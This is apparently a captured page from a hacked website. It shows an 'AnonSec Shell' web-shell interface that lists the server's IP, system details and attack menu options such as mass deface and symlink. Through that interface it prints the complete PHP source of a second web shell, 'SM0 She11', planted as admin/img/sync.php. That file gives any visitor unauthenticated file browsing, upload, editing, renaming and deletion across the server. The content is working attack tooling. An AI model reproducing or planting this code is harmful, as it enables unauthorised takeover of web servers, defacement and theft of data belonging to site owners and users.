. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.6.220   [ Reverse IP ]
Web Server : Apache/2.4.66 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-81.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/ripara.co/admin/img/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/ripara.co/admin/img//sync.php
<?php

@error_reporting(0);

// --- Path Handling ---
$folder = isset($_GET['folder']) ? $_GET['folder'] : '';
$folder = str_replace(["\0"], '', $folder); // sanitize
$fullPath = $folder ? realpath($folder) : getcwd();
if(!$fullPath || !is_dir($fullPath)) $fullPath = getcwd();
$serverPath = $fullPath;

// --- Breadcrumbs ---
function breadcrumbs($fullPath){
    $parts = explode(DIRECTORY_SEPARATOR, $fullPath);
    $build = '';
    $crumbs = [];
    foreach($parts as $p){
        if($p==='') continue;
        $build .= '/'.$p;
        $crumbs[] = "<a href='?folder=" . urlencode($build) . "'>$p</a>";
    }
    return '<p>Path: <a href="?folder=/">/</a> / ' . implode(' / ', $crumbs) . '</p>';
}

// --- Handle POST Actions ---
if($_SERVER['REQUEST_METHOD']==='POST'){
    // Create Fil3
    if(!empty($_POST['new_file'])) @file_put_contents($fullPath . DIRECTORY_SEPARATOR . basename($_POST['new_file']), '');
    // Rename
    if(!empty($_POST['old_name']) && !empty($_POST['new_name'])) @rename($fullPath . DIRECTORY_SEPARATOR . $_POST['old_name'], $fullPath . DIRECTORY_SEPARATOR . $_POST['new_name']);
    // Save edited Fil3
    if(!empty($_POST['edit_file']) && isset($_POST['content'])) @file_put_contents($fullPath . DIRECTORY_SEPARATOR . $_POST['edit_file'], $_POST['content']);
    // Upl04d Fil3
    if(!empty($_FILES['_upl']['tmp_name'])) @copy($_FILES['_upl']['tmp_name'], $fullPath . DIRECTORY_SEPARATOR . basename($_FILES['_upl']['name']));
    header("Location:?folder=" . urlencode($fullPath));
    exit;
}

// --- Delete Fil3/Folders ---
if(isset($_GET['delete'])){
    $target = $fullPath . DIRECTORY_SEPARATOR . $_GET['delete'];
    if(is_dir($target)) @rmdir($target);
    elseif(is_file($target)) @unlink($target);
    header("Location:?folder=" . urlencode($fullPath));
    exit;
}

// --- Directory Listing ---
$items = @scandir($fullPath);

?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>SM0 She11</title>
<style>
body{margin:0;padding:0;font-family:monospace;background:#1c0b2b;color:#d19aff;display:flex;justify-content:center;}
.container{max-width:950px;width:100%;padding:20px;}
a{color:#d19aff;text-decoration:none;} a:hover{color:#ffb3ff;}
ul{list-style:none;padding:0;}
button{padding:5px 10px;border:none;border-radius:4px;background:#d19aff;color:#1c0b2b;font-weight:bold;cursor:pointer;margin-left:3px;}
button:hover{background:#ffb3ff;}
input[type=text]{padding:4px;border-radius:4px;border:1px solid #444;background:#2b1b44;color:#d19aff;}
textarea{width:100%;height:250px;background:#2b1b44;color:#d19aff;border:1px solid #444;border-radius:5px;padding:5px;}
h2{margin-top:0;}
.log{margin:5px 0;padding:5px;background:#2b1b44;border-radius:4px;}
</style>
</head>
<body>
<div class="container">
<h2>SM0 She11</h2>

<!-- Breadcrumbs -->
<?php echo breadcrumbs($fullPath); ?>
<p>Full Path (server): <?php echo htmlspecialchars($serverPath); ?></p>

<!-- Create Fil3 -->
<form method="post" style="margin-bottom:10px;">
<input type="text" name="new_file" placeholder="New File">
<button>Create Fil3</button>
</form>

<!-- Upl04d -->
<form method="post" enctype="multipart/form-data" style="margin-bottom:10px;">
<input type="file" name="_upl">
<button>Upl04d Fil3</button>
</form>

<ul>
<?php
foreach($items as $i){
    if($i==='.' || $i==='..') continue;
    $full=$fullPath.DIRECTORY_SEPARATOR.$i;
    if(is_dir($full)){
        echo "<li>📁 $i 
            <a href='?folder=".urlencode($full)."'>Open</a>
            <a href='?folder=".urlencode($fullPath)."&delete=".urlencode($i)."' onclick='return confirm(\"Delete folder?\")'>[D]</a>
            <form style='display:inline;' method='post'>
                <input type='hidden' name='old_name' value='$i'>
                <input type='text' name='new_name' placeholder='New'>
                <button type='submit' name='action' value='rename'>[R]</button>
            </form>
            </li>";
    }else{
        echo "<li>📄 $i 
            <a href='?folder=".urlencode($fullPath)."&edit=".urlencode($i)."'>[E]</a>
            <a href='?folder=".urlencode($fullPath)."&delete=".urlencode($i)."' onclick='return confirm(\"Delete Fil3?\")'>[D]</a>
            <form style='display:inline;' method='post'>
                <input type='hidden' name='old_name' value='$i'>
                <input type='text' name='new_name' placeholder='New'>
                <button type='submit' name='action' value='rename'>[R]</button>
            </form>
            </li>";
    }
}
?>
</ul>

<?php
// --- Edit Fil3 ---
if(isset($_GET['edit'])){
    $editFile=$fullPath.DIRECTORY_SEPARATOR.$_GET['edit'];
    if(is_file($editFile)){
        $content=htmlspecialchars(file_get_contents($editFile));
        echo "<h3>Editing: ".$_GET['edit']."</h3>";
        echo "<form method='post'>
                <textarea name='content'>$content</textarea><br>
                <input type='hidden' name='edit_file' value='".htmlspecialchars($_GET['edit'])."'>
                <button>Save</button>
              </form>";
    }
}
?>
</div>
</body>
</html>

Anon7 - 2022
AnonSec Team